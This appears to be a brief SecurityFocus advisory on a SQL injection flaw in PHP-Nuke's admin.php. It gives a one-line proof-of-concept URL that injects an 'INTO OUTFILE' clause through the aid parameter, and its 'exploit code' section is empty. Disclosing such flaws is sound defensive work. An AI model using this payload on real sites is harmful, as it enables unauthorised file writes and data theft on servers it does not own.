PHP-Nuke admin.php SQL Injection Vulnerability

The following proof of concept was provided:

http://www.example.com/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%20'/path_to_file/pwd.txt

The following exploit code has been provided:


 

Privacy Statement
Copyright 2010, SecurityFocus